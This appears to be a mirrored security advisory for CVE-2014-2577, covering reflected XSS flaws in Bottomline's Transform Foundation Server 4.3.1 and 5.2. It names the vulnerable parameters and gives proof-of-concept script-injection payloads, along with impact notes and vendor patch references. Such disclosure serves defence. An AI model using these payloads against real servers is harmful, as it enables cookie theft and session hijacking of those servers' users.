Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30844
HistoryJun 14, 2014 - 12:00 a.m.

[CVE-2014-2577] XSS on Transform Foundation Server 4.3.1 and 5.2 from Bottomline Technologies

2014-06-1400:00:00
vulners.com
30

I. VULNERABILITY

Reflected XSS Attacks vulnerabilities in Transform Foundation server
4.3.1 and 5.2 from Bottomline Technologies

II. BACKGROUND

Bottomline offers powerful, next-generation electronic document
solutions for formatting,
personalizing and delivering ERP and business application output.

III. DESCRIPTION

Has been detected several Reflected XSS vulnerability in Transform
Foundation server 4.3.1 and 5.2

  1. XSS on GET parameters:

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"

http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi

  1. XSS on POST parameters:

URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

PARAMETERS:

db="XSS CODE"
referer="XSS CODE"

IV. PROOF OF CONCEPT

GET:

The application does not validate the parameter "pn" correctly.

http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

http://XXXXXXXXXXXXX/<BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi

POST:

The application does not validate the parameter "db" and "rerferer" correctly.

XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

and

referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')

V. BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted
user's browser, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser
allowing Cookie Theft/Session Hijacking, thus enabling full access the
box.

VI. SYSTEMS AFFECTED

Transform Foundation Server 4.3.1
Transform Foundation Server 5.2

VII. SOLUTION

Patches released by the vendor available on customer portal and
information available here:

  1. Transform Foundation Server 4.3.1 Patch 8:
    http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630
SF2364411
SF2391461

  1. Transform Foundation Server 5.2 Patch 7:

http://www.pdf-archive.com/2014/06/03/tf431patch8releasenotes/preview/page/9/

SF2351630
SF2364411
SF2391461

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577

Detected and reported by J. Francisco Bolivar
(es.linkedin.com/in/jfbolivar/) @Jfran_cbit

Related for SECURITYVULNS:DOC:30844